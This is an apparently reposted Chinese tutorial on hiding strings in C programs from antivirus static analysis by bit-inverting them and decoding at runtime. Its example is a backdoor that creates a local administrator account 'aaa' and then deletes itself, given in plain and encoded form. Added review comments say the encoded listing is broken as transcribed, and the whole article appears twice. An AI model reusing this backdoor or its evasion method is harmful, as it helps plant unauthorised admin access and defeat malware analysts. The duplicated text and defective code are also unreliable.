在用汇编写的程序里,为了妨碍反病毒分析人员(AVer)对样本做静态反汇编分析,常常会对程序中的代码和静态数据加以保护,例如插入花指令、对常量字符串编码等。这类手段在C/C++中似乎不容易直接实现。下面介绍我的一种保护字符串的方法。
例如下面程序:
//-----------------------------------------------------------
/*
 * Minimal persistence backdoor: writes a batch script that creates a local
 * user "aaa" with password "bbb", adds it to the Administrators group,
 * deletes this executable and the script itself, then hands the script to
 * system().
 *
 * NOTE(review): documented as found, for analysis only; nothing is fixed.
 * Every "/r/n" below is most likely a transcription of "\r\n" -- the encoded
 * copy of these strings later on this page decodes to real CR LF bytes. As
 * written, the whole script lands on one line.
 */
int main()
{
FILE *fp=fopen("haha.txt","wb"); // NOTE(review): return value never checked; a failed open leads to fprintf(NULL, ...)
fprintf(fp,"net user aaa bbb /add/r/n");
fprintf(fp,"net localgroup administrators aaa /add/r/n");
fprintf(fp,":CLEAR/r/n");
fprintf(fp,"del hack.exe/r/n"); // hack.exe is this program's own file name
fprintf(fp,"if errorlevel 1 goto CLEAR/r/n"); // intended as a retry loop until the running exe can be deleted
fprintf(fp,"del haha.txt");
fclose(fp); // NOTE(review): return value unchecked; a write error goes unnoticed
system("haha.txt"); // NOTE(review): a .txt name is not executed as a batch file by cmd.exe; this presumably just opens it with the associated viewer -- the author likely meant a .bat/.cmd name
return 0;
}
//-----------------------------------------------------------
这是一个简单的开后门程序:它生成一个批处理脚本,新建本地账号并加入管理员组,随后删除自身。要让这些命令不以明文形式出现在可执行文件中,可以用下面的方法对字符串编码(注意:下面的代码在本页转载时有转义符丢失等问题,解密循环和指针推进也有逻辑错误,原样不能直接编译运行):
//-----------------------------------------------------------
/*
 * Same backdoor as above, but every string literal is stored NOT-encoded
 * (each byte is the bitwise complement of the plaintext) and decoded at
 * runtime, so the commands do not appear as plaintext in the PE image.
 *
 * NOTE(review): as reproduced on this page the listing neither compiles nor
 * runs; the defects are called out inline. Documented for analysis only --
 * nothing is fixed here.
 */
int main()
{
int i;
/* NOTE(review): the '/x97' character constants are almost certainly a
 * transcription of '\x97' (backslash mangled into a forward slash). As
 * written they are four-character multi-char constants whose value is
 * implementation-defined and does not fit in a char. */
char msg[]= {
'/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87','/x8B','/xFF','/x88',
'/x9D','/xFF','/x91','/x9A','/x8B','/xDF','/x8A','/x8C','/x9A','/x8D',
'/xDF','/x9E','/x9E','/x9E','/xDF','/x9D','/x9D','/x9D','/xDF','/xD0',
'/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/x91','/x9A','/x8B','/xDF',
'/x93','/x90','/x9C','/x9E','/x93','/x98','/x8D','/x90','/x8A','/x8F',
'/xDF','/x9E','/x9B','/x92','/x96','/x91','/x96','/x8C','/x8B','/x8D',
'/x9E','/x8B','/x90','/x8D','/x8C','/xDF','/x9E','/x9E','/x9E','/xDF',
'/xD0','/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/xC5','/xBC','/xB3',
'/xBA','/xBE','/xAD','/xF2','/xF5','/xFF','/x9B','/x9A','/x93','/xDF',
'/x97','/x9E','/x9C','/x94','/xD1','/x9A','/x87','/x9A','/xF2','/xF5',
'/xFF','/x96','/x99','/xDF','/x9A','/x8D','/x8D','/x90','/x8D','/x93',
'/x9A','/x89','/x9A','/x93','/xDF','/xCE','/xDF','/x98','/x90','/x8B',
'/x90','/xDF','/xBC','/xB3','/xBA','/xBE','/xAD','/xF2','/xF5','/xFF',
'/x9B','/x9A','/x93','/xDF','/x97','/x9E','/x97','/x9E','/xD1','/x8B',
'/x87','/x8B','/xFF','/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87',
'/x8B','/xFF'
},*pos=msg;
// Decoded plaintext, stored back to back as NUL-terminated strings
// (0xFF is the encoded NUL; 0xF2 0xF5 decode to "\r\n"):
// {"haha.txt","wb","net user aaa bbb /add\r\n",
//  "net localgroup administrators aaa /add\r\n",
//  ":CLEAR\r\n","del hack.exe\r\n","if errorlevel 1 goto CLEAR\r\n",
//  "del haha.txt","haha.txt"
// }
// NOTE(review): the encoded array contains no zero byte (every NUL became
// 0xFF), so strlen(msg) reads past the end of msg on the first iteration --
// undefined behaviour. Once msg[8] is flipped back to NUL, strlen(msg)
// becomes 8 and the loop stops: only "haha.txt" is ever decoded; "wb" and
// all the batch lines stay encoded. The bound was presumably meant to be
// sizeof msg.
// NOTE(review): 'msg =~msg' does not compile (assignment to an array); the
// index was probably lost in transcription -- the intent is msg[i] = ~msg[i].
for(i=0 ; i<strlen(msg) ; i++)
msg =~msg; // decode in place
// NOTE(review): pos+9 assumes "haha.txt" occupies exactly 9 bytes including
// its NUL so that the mode string "wb" starts at offset 9. fopen() can fail
// (and does if "wb" was never decoded) and the result is never checked.
FILE *fp=fopen(pos,pos+9);
// NOTE(review): pos still points at the first string here, so the six
// iterations write "haha.txt", "wb", "net user ...", "net localgroup ...",
// ":CLEAR", "del hack.exe" instead of the six batch lines, and pos ends on
// "if errorlevel 1 goto CLEAR" rather than on the final "haha.txt" that
// system() was meant to receive. pos needs to be advanced past the file name
// and mode (two strings) before the loop.
// NOTE(review): fprintf() is handed a non-literal format string; fputs(pos, fp)
// is the safe equivalent.
for(i=0;i<6;i++) {
fprintf(fp,pos);
pos+=strlen(pos)+1; // step to the next NUL-terminated string
}
fclose(fp); // NOTE(review): return value unchecked
system(pos); // runs whatever string pos ended on (see note above)
return 0;
}
//-----------------------------------------------------------
用到的算法其实很简单:把字符串按字节取反(或用其他可逆变换)后以密文形式保存在源码里,运行时再用一小段解密代码还原,很是方便。Win32程序反汇编后的代码很冗长,其中的明文字符串往往是分析人员最先抓住的线索;如果在一堆汇编代码里看不到一段认识的内容,是谁头都会大。这种方法也可以增加别人破解你的程序的难度——破解者在寻找注册码校验位置时,大多是从PE文件中的明文字符串入手的。当然,这时字符串的加密算法就得复杂一点了:按位取反这种变换,分析人员一眼就能看穿。还要说明的是,这只能对抗对可执行文件的静态字符串扫描;字符串在运行时仍会以明文出现在内存中,调试器下断点、内存转储或沙箱动态分析都能直接拿到,而且创建账号、加入管理员组这类行为本身会留下系统日志,隐藏字符串并不改变程序的行为特征。如果程序中需要加密的静态数据很多,可以写一个代码生成器自动产生密文,这里就不再赘言了。
例如下面程序:
//-----------------------------------------------------------
/*
 * Minimal persistence backdoor: writes a batch script that creates a local
 * user "aaa" with password "bbb", adds it to the Administrators group,
 * deletes this executable and the script itself, then hands the script to
 * system().
 *
 * NOTE(review): documented as found, for analysis only; nothing is fixed.
 * Every "/r/n" below is most likely a transcription of "\r\n" -- the encoded
 * copy of these strings later on this page decodes to real CR LF bytes. As
 * written, the whole script lands on one line.
 */
int main()
{
FILE *fp=fopen("haha.txt","wb"); // NOTE(review): return value never checked; a failed open leads to fprintf(NULL, ...)
fprintf(fp,"net user aaa bbb /add/r/n");
fprintf(fp,"net localgroup administrators aaa /add/r/n");
fprintf(fp,":CLEAR/r/n");
fprintf(fp,"del hack.exe/r/n"); // hack.exe is this program's own file name
fprintf(fp,"if errorlevel 1 goto CLEAR/r/n"); // intended as a retry loop until the running exe can be deleted
fprintf(fp,"del haha.txt");
fclose(fp); // NOTE(review): return value unchecked; a write error goes unnoticed
system("haha.txt"); // NOTE(review): a .txt name is not executed as a batch file by cmd.exe; this presumably just opens it with the associated viewer -- the author likely meant a .bat/.cmd name
return 0;
}
//-----------------------------------------------------------
这是一个简单的开后门程序:它生成一个批处理脚本,新建本地账号并加入管理员组,随后删除自身。要让这些命令不以明文形式出现在可执行文件中,可以用下面的方法对字符串编码(注意:下面的代码在本页转载时有转义符丢失等问题,解密循环和指针推进也有逻辑错误,原样不能直接编译运行):
//-----------------------------------------------------------
/*
 * Same backdoor as above, but every string literal is stored NOT-encoded
 * (each byte is the bitwise complement of the plaintext) and decoded at
 * runtime, so the commands do not appear as plaintext in the PE image.
 *
 * NOTE(review): as reproduced on this page the listing neither compiles nor
 * runs; the defects are called out inline. Documented for analysis only --
 * nothing is fixed here.
 */
int main()
{
int i;
/* NOTE(review): the '/x97' character constants are almost certainly a
 * transcription of '\x97' (backslash mangled into a forward slash). As
 * written they are four-character multi-char constants whose value is
 * implementation-defined and does not fit in a char. */
char msg[]= {
'/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87','/x8B','/xFF','/x88',
'/x9D','/xFF','/x91','/x9A','/x8B','/xDF','/x8A','/x8C','/x9A','/x8D',
'/xDF','/x9E','/x9E','/x9E','/xDF','/x9D','/x9D','/x9D','/xDF','/xD0',
'/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/x91','/x9A','/x8B','/xDF',
'/x93','/x90','/x9C','/x9E','/x93','/x98','/x8D','/x90','/x8A','/x8F',
'/xDF','/x9E','/x9B','/x92','/x96','/x91','/x96','/x8C','/x8B','/x8D',
'/x9E','/x8B','/x90','/x8D','/x8C','/xDF','/x9E','/x9E','/x9E','/xDF',
'/xD0','/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/xC5','/xBC','/xB3',
'/xBA','/xBE','/xAD','/xF2','/xF5','/xFF','/x9B','/x9A','/x93','/xDF',
'/x97','/x9E','/x9C','/x94','/xD1','/x9A','/x87','/x9A','/xF2','/xF5',
'/xFF','/x96','/x99','/xDF','/x9A','/x8D','/x8D','/x90','/x8D','/x93',
'/x9A','/x89','/x9A','/x93','/xDF','/xCE','/xDF','/x98','/x90','/x8B',
'/x90','/xDF','/xBC','/xB3','/xBA','/xBE','/xAD','/xF2','/xF5','/xFF',
'/x9B','/x9A','/x93','/xDF','/x97','/x9E','/x97','/x9E','/xD1','/x8B',
'/x87','/x8B','/xFF','/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87',
'/x8B','/xFF'
},*pos=msg;
// Decoded plaintext, stored back to back as NUL-terminated strings
// (0xFF is the encoded NUL; 0xF2 0xF5 decode to "\r\n"):
// {"haha.txt","wb","net user aaa bbb /add\r\n",
//  "net localgroup administrators aaa /add\r\n",
//  ":CLEAR\r\n","del hack.exe\r\n","if errorlevel 1 goto CLEAR\r\n",
//  "del haha.txt","haha.txt"
// }
// NOTE(review): the encoded array contains no zero byte (every NUL became
// 0xFF), so strlen(msg) reads past the end of msg on the first iteration --
// undefined behaviour. Once msg[8] is flipped back to NUL, strlen(msg)
// becomes 8 and the loop stops: only "haha.txt" is ever decoded; "wb" and
// all the batch lines stay encoded. The bound was presumably meant to be
// sizeof msg.
// NOTE(review): 'msg =~msg' does not compile (assignment to an array); the
// index was probably lost in transcription -- the intent is msg[i] = ~msg[i].
for(i=0 ; i<strlen(msg) ; i++)
msg =~msg; // decode in place
// NOTE(review): pos+9 assumes "haha.txt" occupies exactly 9 bytes including
// its NUL so that the mode string "wb" starts at offset 9. fopen() can fail
// (and does if "wb" was never decoded) and the result is never checked.
FILE *fp=fopen(pos,pos+9);
// NOTE(review): pos still points at the first string here, so the six
// iterations write "haha.txt", "wb", "net user ...", "net localgroup ...",
// ":CLEAR", "del hack.exe" instead of the six batch lines, and pos ends on
// "if errorlevel 1 goto CLEAR" rather than on the final "haha.txt" that
// system() was meant to receive. pos needs to be advanced past the file name
// and mode (two strings) before the loop.
// NOTE(review): fprintf() is handed a non-literal format string; fputs(pos, fp)
// is the safe equivalent.
for(i=0;i<6;i++) {
fprintf(fp,pos);
pos+=strlen(pos)+1; // step to the next NUL-terminated string
}
fclose(fp); // NOTE(review): return value unchecked
system(pos); // runs whatever string pos ended on (see note above)
return 0;
}
//-----------------------------------------------------------
用到的算法其实很简单:把字符串按字节取反(或用其他可逆变换)后以密文形式保存在源码里,运行时再用一小段解密代码还原,很是方便。Win32程序反汇编后的代码很冗长,其中的明文字符串往往是分析人员最先抓住的线索;如果在一堆汇编代码里看不到一段认识的内容,是谁头都会大。这种方法也可以增加别人破解你的程序的难度——破解者在寻找注册码校验位置时,大多是从PE文件中的明文字符串入手的。当然,这时字符串的加密算法就得复杂一点了:按位取反这种变换,分析人员一眼就能看穿。还要说明的是,这只能对抗对可执行文件的静态字符串扫描;字符串在运行时仍会以明文出现在内存中,调试器下断点、内存转储或沙箱动态分析都能直接拿到,而且创建账号、加入管理员组这类行为本身会留下系统日志,隐藏字符串并不改变程序的行为特征。如果程序中需要加密的静态数据很多,可以写一个代码生成器自动产生密文,这里就不再赘言了。